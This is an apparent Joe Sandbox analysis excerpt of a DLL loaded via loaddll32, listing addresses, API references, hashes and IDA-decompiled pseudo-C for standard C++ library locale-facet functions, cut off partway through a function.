0x6e20f269
0x6e20f267
0x6e20f1da
0x6e20f1da
0x6e20f1dd
0x6e20f1e1
0x6e20f1e5
0x6e20f1f2
0x6e20f1fa
0x6e20f1fc
0x00000000
0x6e20f1fc
0x6e20f1c3
0x6e20f1c3
0x00000000
0x6e20f1c3
0x6e20f1c1
0x6e20f134
0x6e20f134
0x6e20f137
0x6e20f13b
0x6e20f13f
0x6e20f14c
0x6e20f154
0x6e20f156
0x00000000
0x6e20f156
0x6e20f11d
0x6e20f11d
0x00000000
0x6e20f11d
0x6e20f11b
0x6e20f08e
0x6e20f08e
0x6e20f091
0x6e20f095
0x6e20f099
0x6e20f0a6
0x6e20f0ae
0x6e20f0b0
0x00000000
0x6e20f0b0
0x6e20f077
0x6e20f077
0x00000000
0x6e20f077
0x6e20f075

APIs

__EH_prolog3.LIBCMT ref: 6E20F03E
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F048
int.LIBCPMT ref: 6E20F05F

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

collate.LIBCPMT ref: 6E20F082
std::_Facet_Register.LIBCPMT ref: 6E20F099
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F0B9
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F0D7

Strings

hm,n, xrefs: 6E20F053

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID: hm,n
API String ID: 2363045490-216170354
Opcode ID: 369bf358384b0891e81e77dbc458c43d2a7b9511c54c6e9f5a7545020ce64823
Instruction ID: 8519a0802e7460ad01b3930bf57e452b782981e6e66726a5dec00c1ad9930e6d
Opcode Fuzzy Hash: 369bf358384b0891e81e77dbc458c43d2a7b9511c54c6e9f5a7545020ce64823
Instruction Fuzzy Hash: 8C110676D0051ECBCF00DBE0C894AEEB7BBAF84715F240908E4106B2D4DBB59A45C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20A0FF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20A0FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				char _v32;
				void* _t63;
				intOrPtr* _t64;
				void* _t76;
				void* _t89;
				void* _t102;
				intOrPtr* _t158;
				intOrPtr* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				void* _t181;

				_t171 = __edx;
				_t130 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t178 =  *0x6e2c6cc8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t178;
				_t63 = E6E1E161C(0x6e2c6b38);
				_t133 = _a8;
				_t64 = E6E1E171B(_a8, _t63);
				_t173 = _t64;
				if(_t64 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t173);
				} else {
					if(_t178 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20A9D2(__ebx, _t133, __edx, _t173, _t178) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438( &_v32);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t173, _t178, 0x14);
							E6E206653( &_v20, 0);
							_t179 =  *0x6e2c6ccc; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t179;
							_t76 = E6E1E161C(0x6e2c6cb8);
							_t140 = _a8;
							_t174 = E6E1E171B(_a8, _t76);
							__eflags = _t174;
							if(_t174 != 0) {
								L12:
								E6E2066BA( &_v20);
								return E6E220075(_t174);
							} else {
								__eflags = _t179;
								if(_t179 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E20AA38(_t130, _t140, __edx, _t174, _t179) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438( &_v32);
										E6E223D74( &_v32, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t130, _t174, _t179, 0x14);
										E6E206653( &_v20, 0);
										_t180 =  *0x6e2c6cd0; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t180;
										_t89 = E6E1E161C(0x6e2c6cbc);
										_t147 = _a8;
										_t175 = E6E1E171B(_a8, _t89);
										__eflags = _t175;
										if(_t175 != 0) {
											L19:
											E6E2066BA( &_v20);
											return E6E220075(_t175);
										} else {
											__eflags = _t180;
											if(_t180 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E20AAA0(_t130, _t147, __edx, _t175, _t180) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438( &_v32);
													E6E223D74( &_v32, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t130, _t175, _t180, 0x14);
													E6E206653( &_v20, 0);
													_t181 =  *0x6e2c6cd4; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t181;
													_t102 = E6E1E161C(0x6e2c6cc0);
													_t154 = _a8;
													_t176 = E6E1E171B(_a8, _t102);
													__eflags = _t176;
													if(_t176 != 0) {
														L26:
														E6E2066BA( &_v20);
														return E6E220075(_t176);
													} else {
														__eflags = _t181;
														if(_t181 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6E20AB08(_t130, _t154, _t171, _t176, _t181) - 0xffffffff;
															if(__eflags == 0) {
																_t158 =  &_v32;
																E6E1E1438(_t158);
																E6E223D74( &_v32, 0x6e2c3504);
																asm("int3");
																_push(_t158);
																 *((intOrPtr*)(_t158 + 4)) = _v8;
																_v24 = _t158;
																 *_t158 = 0x6e26ba24;
																return _t158;
															} else {
																_t176 = _v16;
																_v16 = _t176;
																_v4 = 1;
																E6E206FD3(__eflags, _t176);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t176 + 4))))();
																 *0x6e2c6cd4 = _t176;
																goto L26;
															}
														} else {
															_t176 = _t181;
															goto L26;
														}
													}
												} else {
													_t175 = _v16;
													_v16 = _t175;
													_v4 = 1;
													E6E206FD3(__eflags, _t175);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t175 + 4))))();
													 *0x6e2c6cd0 = _t175;
													goto L19;
												}
											} else {
												_t175 = _t180;
												goto L19;
											}
										}
									} else {
										_t174 = _v16;
										_v16 = _t174;
										_v4 = 1;
										E6E206FD3(__eflags, _t174);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 4))))();
										 *0x6e2c6ccc = _t174;
										goto L12;
									}
								} else {
									_t174 = _t179;
									goto L12;
								}
							}
						} else {
							_t173 = _v16;
							_v16 = _t173;
							_v4 = 1;
							E6E206FD3(__eflags, _t173);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 4))))();
							 *0x6e2c6cc8 = _t173;
							goto L5;
						}
					} else {
						_t173 = _t178;
						goto L5;
					}
				}
			}

0x6e20a0ff
0x6e20a0ff
0x6e20a106
0x6e20a110
0x6e20a115
0x6e20a120
0x6e20a124
0x6e20a127
0x6e20a12c
0x6e20a130
0x6e20a135
0x6e20a139
0x6e20a17e
0x6e20a181
0x6e20a18d
0x6e20a13b
0x6e20a13d
0x6e20a143
0x6e20a149
0x6e20a151
0x6e20a154
0x6e20a191
0x6e20a19f
0x6e20a1a4
0x6e20a1ac
0x6e20a1b6
0x6e20a1bb
0x6e20a1c6
0x6e20a1ca
0x6e20a1cd
0x6e20a1d2
0x6e20a1db
0x6e20a1dd
0x6e20a1df
0x6e20a224
0x6e20a227
0x6e20a233
0x6e20a1e1
0x6e20a1e1
0x6e20a1e3
0x6e20a1e9
0x6e20a1ef
0x6e20a1f7
0x6e20a1fa
0x6e20a237
0x6e20a245
0x6e20a24a
0x6e20a252
0x6e20a25c
0x6e20a261
0x6e20a26c
0x6e20a270
0x6e20a273
0x6e20a278
0x6e20a281
0x6e20a283
0x6e20a285
0x6e20a2ca
0x6e20a2cd
0x6e20a2d9
0x6e20a287
0x6e20a287
0x6e20a289
0x6e20a28f
0x6e20a295
0x6e20a29d
0x6e20a2a0
0x6e20a2dd
0x6e20a2eb
0x6e20a2f0
0x6e20a2f8
0x6e20a302
0x6e20a307
0x6e20a312
0x6e20a316
0x6e20a319
0x6e20a31e
0x6e20a327
0x6e20a329
0x6e20a32b
0x6e20a370
0x6e20a373
0x6e20a37f
0x6e20a32d
0x6e20a32d
0x6e20a32f
0x6e20a335
0x6e20a33b
0x6e20a343
0x6e20a346
0x6e20a380
0x6e20a383
0x6e20a391
0x6e20a396
0x6e20a39a
0x6e20a39e
0x6e20a3a3
0x6e20a3a6
0x6e20a3ad
0x6e20a348
0x6e20a348
0x6e20a34b
0x6e20a34f
0x6e20a353
0x6e20a360
0x6e20a368
0x6e20a36a
0x00000000
0x6e20a36a
0x6e20a331
0x6e20a331
0x00000000
0x6e20a331
0x6e20a32f
0x6e20a2a2
0x6e20a2a2
0x6e20a2a5
0x6e20a2a9
0x6e20a2ad
0x6e20a2ba
0x6e20a2c2
0x6e20a2c4
0x00000000
0x6e20a2c4
0x6e20a28b
0x6e20a28b
0x00000000
0x6e20a28b
0x6e20a289
0x6e20a1fc
0x6e20a1fc
0x6e20a1ff
0x6e20a203
0x6e20a207
0x6e20a214
0x6e20a21c
0x6e20a21e
0x00000000
0x6e20a21e
0x6e20a1e5
0x6e20a1e5
0x00000000
0x6e20a1e5
0x6e20a1e3
0x6e20a156
0x6e20a156
0x6e20a159
0x6e20a15d
0x6e20a161
0x6e20a16e
0x6e20a176
0x6e20a178
0x00000000
0x6e20a178
0x6e20a13f
0x6e20a13f
0x00000000
0x6e20a13f
0x6e20a13d

APIs

__EH_prolog3.LIBCMT ref: 6E20A106
std::_Lockit::_Lockit.LIBCPMT ref: 6E20A110
int.LIBCPMT ref: 6E20A127

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

ctype.LIBCPMT ref: 6E20A14A
std::_Facet_Register.LIBCPMT ref: 6E20A161
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A181
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20A19F

Strings

8k,n, xrefs: 6E20A11B

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: 8k,n
API String ID: 1394824916-3277982818
Opcode ID: dfef0be74a9ee87519e02a32c5871714b09756194fae8221ac19bc58ee90b160
Instruction ID: b6c44b0feb4037195d911b7b5e00fb8f9856d6b3a6d158228e63df7fbba6607d
Opcode Fuzzy Hash: dfef0be74a9ee87519e02a32c5871714b09756194fae8221ac19bc58ee90b160
Instruction Fuzzy Hash: A011A3B5A1051D9BCF01DBE4C898AEDB77BAF44B14F140919E4106B2D0DFB49A44C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F0DD, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20F0DD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t279;
				signed int _t280;
				void* _t292;
				void* _t305;
				void* _t318;
				void* _t331;
				void* _t344;
				void* _t357;
				void* _t370;
				void* _t383;
				void* _t396;
				void* _t409;
				void* _t422;
				void* _t435;
				void* _t448;
				void* _t461;
				void* _t474;
				void* _t487;
				void* _t500;
				void* _t513;
				signed int _t739;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				void* _t858;

				_t797 = __edx;
				_t606 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t858 - 0x14, 0);
				_t819 =  *0x6e2c6dd4; // 0x0
				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
				 *(_t858 - 0x10) = _t819;
				_t279 = E6E1E161C(0x6e2c6b28);
				_t609 =  *((intOrPtr*)(_t858 + 8));
				_t280 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t279);
				_t799 = _t280;
				if(_t280 != 0) {
					L5:
					E6E2066BA(_t858 - 0x14);
					return E6E220075(_t799);
				} else {
					if(_t819 == 0) {
						_push( *((intOrPtr*)(_t858 + 8)));
						_push(_t858 - 0x10);
						__eflags = E6E210E47(__ebx, _t609, __edx, _t799, _t819) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t858 - 0x20);
							E6E223D74(_t858 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t799, _t819, 0x14);
							E6E206653(_t858 - 0x14, 0);
							_t820 =  *0x6e2c6de8; // 0x0
							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
							 *(_t858 - 0x10) = _t820;
							_t292 = E6E1E161C(0x6e2c6d94);
							_t616 =  *((intOrPtr*)(_t858 + 8));
							_t800 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t292);
							__eflags = _t800;
							if(_t800 != 0) {
								L12:
								E6E2066BA(_t858 - 0x14);
								return E6E220075(_t800);
							} else {
								__eflags = _t820;
								if(_t820 == 0) {
									_push( *((intOrPtr*)(_t858 + 8)));
									_push(_t858 - 0x10);
									__eflags = E6E210EB7(_t606, _t616, __edx, _t800, _t820) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t858 - 0x20);
										E6E223D74(_t858 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t606, _t800, _t820, 0x14);
										E6E206653(_t858 - 0x14, 0);
										_t821 =  *0x6e2c6db8; // 0x0
										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
										 *(_t858 - 0x10) = _t821;
										_t305 = E6E1E161C(0x6e2c6d6c);
										_t623 =  *((intOrPtr*)(_t858 + 8));
										_t801 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t305);
										__eflags = _t801;
										if(_t801 != 0) {
											L19:
											E6E2066BA(_t858 - 0x14);
											return E6E220075(_t801);
										} else {
											__eflags = _t821;
											if(_t821 == 0) {
												_push( *((intOrPtr*)(_t858 + 8)));
												_push(_t858 - 0x10);
												__eflags = E6E210F1F(_t606, _t623, __edx, _t801, _t821) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t858 - 0x20);
													E6E223D74(_t858 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t606, _t801, _t821, 0x14);
													E6E206653(_t858 - 0x14, 0);
													_t822 =  *0x6e2c6dec; // 0x0
													 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
													 *(_t858 - 0x10) = _t822;
													_t318 = E6E1E161C(0x6e2c6d98);
													_t630 =  *((intOrPtr*)(_t858 + 8));
													_t802 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t318);
													__eflags = _t802;
													if(_t802 != 0) {
														L26:
														E6E2066BA(_t858 - 0x14);
														return E6E220075(_t802);
													} else {
														__eflags = _t822;
														if(_t822 == 0) {
															_push( *((intOrPtr*)(_t858 + 8)));
															_push(_t858 - 0x10);
															__eflags = E6E210F87(_t606, _t630, _t797, _t802, _t822) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t858 - 0x20);
																E6E223D74(_t858 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t606, _t802, _t822, 0x14);
																E6E206653(_t858 - 0x14, 0);
																_t823 =  *0x6e2c6dbc; // 0x0
																 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																 *(_t858 - 0x10) = _t823;
																_t331 = E6E1E161C(0x6e2c6d70);
																_t637 =  *((intOrPtr*)(_t858 + 8));
																_t803 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t331);
																__eflags = _t803;
																if(_t803 != 0) {
																	L33:
																	E6E2066BA(_t858 - 0x14);
																	return E6E220075(_t803);
																} else {
																	__eflags = _t823;
																	if(_t823 == 0) {
																		_push( *((intOrPtr*)(_t858 + 8)));
																		_push(_t858 - 0x10);
																		__eflags = E6E210FEF(_t606, _t637, _t797, _t803, _t823) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t858 - 0x20);
																			E6E223D74(_t858 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t606, _t803, _t823, 0x14);
																			E6E206653(_t858 - 0x14, 0);
																			_t824 =  *0x6e2c6df0; // 0x0
																			 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																			 *(_t858 - 0x10) = _t824;
																			_t344 = E6E1E161C(0x6e2c6d9c);
																			_t644 =  *((intOrPtr*)(_t858 + 8));
																			_t804 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t344);
																			__eflags = _t804;
																			if(_t804 != 0) {
																				L40:
																				E6E2066BA(_t858 - 0x14);
																				return E6E220075(_t804);
																			} else {
																				__eflags = _t824;
																				if(_t824 == 0) {
																					_push( *((intOrPtr*)(_t858 + 8)));
																					_push(_t858 - 0x10);
																					__eflags = E6E211057(_t606, _t644, _t797, _t804, _t824) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t858 - 0x20);
																						E6E223D74(_t858 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t606, _t804, _t824, 0x14);
																						E6E206653(_t858 - 0x14, 0);
																						_t825 =  *0x6e2c6dc0; // 0x0
																						 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																						 *(_t858 - 0x10) = _t825;
																						_t357 = E6E1E161C(0x6e2c6d74);
																						_t651 =  *((intOrPtr*)(_t858 + 8));
																						_t805 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t357);
																						__eflags = _t805;
																						if(_t805 != 0) {
																							L47:
																							E6E2066BA(_t858 - 0x14);
																							return E6E220075(_t805);
																						} else {
																							__eflags = _t825;
																							if(_t825 == 0) {
																								_push( *((intOrPtr*)(_t858 + 8)));
																								_push(_t858 - 0x10);
																								__eflags = E6E2110BF(_t606, _t651, _t797, _t805, _t825) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t858 - 0x20);
																									E6E223D74(_t858 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t606, _t805, _t825, 0x14);
																									E6E206653(_t858 - 0x14, 0);
																									_t826 =  *0x6e2c6df8; // 0x0
																									 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																									 *(_t858 - 0x10) = _t826;
																									_t370 = E6E1E161C(0x6e2c6da4);
																									_t658 =  *((intOrPtr*)(_t858 + 8));
																									_t806 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t370);
																									__eflags = _t806;
																									if(_t806 != 0) {
																										L54:
																										E6E2066BA(_t858 - 0x14);
																										return E6E220075(_t806);
																									} else {
																										__eflags = _t826;
																										if(_t826 == 0) {
																											_push( *((intOrPtr*)(_t858 + 8)));
																											_push(_t858 - 0x10);
																											__eflags = E6E211127(_t606, _t658, _t797, _t806, _t826) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t858 - 0x20);
																												E6E223D74(_t858 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t606, _t806, _t826, 0x14);
																												E6E206653(_t858 - 0x14, 0);
																												_t827 =  *0x6e2c6df4; // 0x0
																												 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																												 *(_t858 - 0x10) = _t827;
																												_t383 = E6E1E161C(0x6e2c6da0);
																												_t665 =  *((intOrPtr*)(_t858 + 8));
																												_t807 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t383);
																												__eflags = _t807;
																												if(_t807 != 0) {
																													L61:
																													E6E2066BA(_t858 - 0x14);
																													return E6E220075(_t807);
																												} else {
																													__eflags = _t827;
																													if(_t827 == 0) {
																														_push( *((intOrPtr*)(_t858 + 8)));
																														_push(_t858 - 0x10);
																														__eflags = E6E2111AB(_t606, _t665, _t797, _t807, _t827) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t858 - 0x20);
																															E6E223D74(_t858 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t606, _t807, _t827, 0x14);
																															E6E206653(_t858 - 0x14, 0);
																															_t828 =  *0x6e2c6dc8; // 0x0
																															 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																															 *(_t858 - 0x10) = _t828;
																															_t396 = E6E1E161C(0x6e2c6d7c);
																															_t672 =  *((intOrPtr*)(_t858 + 8));
																															_t808 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t396);
																															__eflags = _t808;
																															if(_t808 != 0) {
																																L68:
																																E6E2066BA(_t858 - 0x14);
																																return E6E220075(_t808);
																															} else {
																																__eflags = _t828;
																																if(_t828 == 0) {
																																	_push( *((intOrPtr*)(_t858 + 8)));
																																	_push(_t858 - 0x10);
																																	__eflags = E6E211230(_t606, _t672, _t797, _t808, _t828) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t858 - 0x20);
																																		E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t606, _t808, _t828, 0x14);
																																		E6E206653(_t858 - 0x14, 0);
																																		_t829 =  *0x6e2c6dc4; // 0x0
																																		 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																		 *(_t858 - 0x10) = _t829;
																																		_t409 = E6E1E161C(0x6e2c6d78);
																																		_t679 =  *((intOrPtr*)(_t858 + 8));
																																		_t809 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t409);
																																		__eflags = _t809;
																																		if(_t809 != 0) {
																																			L75:
																																			E6E2066BA(_t858 - 0x14);
																																			return E6E220075(_t809);
																																		} else {
																																			__eflags = _t829;
																																			if(_t829 == 0) {
																																				_push( *((intOrPtr*)(_t858 + 8)));
																																				_push(_t858 - 0x10);
																																				__eflags = E6E2112B4(_t606, _t679, _t797, _t809, _t829) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t858 - 0x20);
																																					E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t606, _t809, _t829, 0x14);
																																					E6E206653(_t858 - 0x14, 0);
																																					_t830 =  *0x6e2c6dd8; // 0x0
																																					 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																					 *(_t858 - 0x10) = _t830;
																																					_t422 = E6E1E161C(0x6e2c6d84);
																																					_t686 =  *((intOrPtr*)(_t858 + 8));
																																					_t810 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t422);
																																					__eflags = _t810;
																																					if(_t810 != 0) {
																																						L82:
																																						E6E2066BA(_t858 - 0x14);
																																						return E6E220075(_t810);
																																					} else {
																																						__eflags = _t830;
																																						if(_t830 == 0) {
																																							_push( *((intOrPtr*)(_t858 + 8)));
																																							_push(_t858 - 0x10);
																																							__eflags = E6E211339(_t606, _t686, _t797, _t810, _t830) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t858 - 0x20);
																																								E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t606, _t810, _t830, 0x14);
																																								E6E206653(_t858 - 0x14, 0);
																																								_t831 =  *0x6e2c6db0; // 0x0
																																								 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																								 *(_t858 - 0x10) = _t831;
																																								_t435 = E6E1E161C(0x6e2c6d64);
																																								_t693 =  *((intOrPtr*)(_t858 + 8));
																																								_t811 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t435);
																																								__eflags = _t811;
																																								if(_t811 != 0) {
																																									L89:
																																									E6E2066BA(_t858 - 0x14);
																																									return E6E220075(_t811);
																																								} else {
																																									__eflags = _t831;
																																									if(_t831 == 0) {
																																										_push( *((intOrPtr*)(_t858 + 8)));
																																										_push(_t858 - 0x10);
																																										__eflags = E6E2113A1(_t606, _t693, _t797, _t811, _t831) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t858 - 0x20);
																																											E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t606, _t811, _t831, 0x14);
																																											E6E206653(_t858 - 0x14, 0);
																																											_t832 =  *0x6e2c6ddc; // 0x0
																																											 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																											 *(_t858 - 0x10) = _t832;
																																											_t448 = E6E1E161C(0x6e2c6d88);
																																											_t700 =  *((intOrPtr*)(_t858 + 8));
																																											_t812 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t448);
																																											__eflags = _t812;
																																											if(_t812 != 0) {
																																												L96:
																																												E6E2066BA(_t858 - 0x14);
																																												return E6E220075(_t812);
																																											} else {
																																												__eflags = _t832;
																																												if(_t832 == 0) {
																																													_push( *((intOrPtr*)(_t858 + 8)));
																																													_push(_t858 - 0x10);
																																													__eflags = E6E211409(_t606, _t700, _t797, _t812, _t832) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t858 - 0x20);
																																														E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t606, _t812, _t832, 0x14);
																																														E6E206653(_t858 - 0x14, 0);
																																														_t833 =  *0x6e2c6de0; // 0x0
																																														 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																														 *(_t858 - 0x10) = _t833;
																																														_t461 = E6E1E161C(0x6e2c6d8c);
																																														_t707 =  *((intOrPtr*)(_t858 + 8));
																																														_t813 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t461);
																																														__eflags = _t813;
																																														if(_t813 != 0) {
																																															L103:
																																															E6E2066BA(_t858 - 0x14);
																																															return E6E220075(_t813);
																																														} else {
																																															__eflags = _t833;
																																															if(_t833 == 0) {
																																																_push( *((intOrPtr*)(_t858 + 8)));
																																																_push(_t858 - 0x10);
																																																__eflags = E6E211471(_t606, _t707, _t797, _t813, _t833) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t858 - 0x20);
																																																	E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t606, _t813, _t833, 0x14);
																																																	E6E206653(_t858 - 0x14, 0);
																																																	_t834 =  *0x6e2c6dfc; // 0x0
																																																	 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																	 *(_t858 - 0x10) = _t834;
																																																	_t474 = E6E1E161C(0x6e2c6da8);
																																																	_t714 =  *((intOrPtr*)(_t858 + 8));
																																																	_t814 = E6E1E171B( *((intOrPtr*)(_t858 + 8)), _t474);
																																																	__eflags = _t814;
																																																	if(_t814 != 0) {
																																																		L110:
																																																		E6E2066BA(_t858 - 0x14);
																																																		return E6E220075(_t814);
																																																	} else {
																																																		__eflags = _t834;
																																																		if(_t834 == 0) {
																																																			_push( *((intOrPtr*)(_t858 + 8)));
																																																			_push(_t858 - 0x10);
																																																			__eflags = E6E2114EC(_t606, _t714, _t797, _t814, _t834) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1E1438(_t858 - 0x20);
																																																				E6E223D74(_t858 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e2683cf, _t606, _t814, _t834, 0x14);
																																																				E6E206653(_t858 - 0x14, 0);
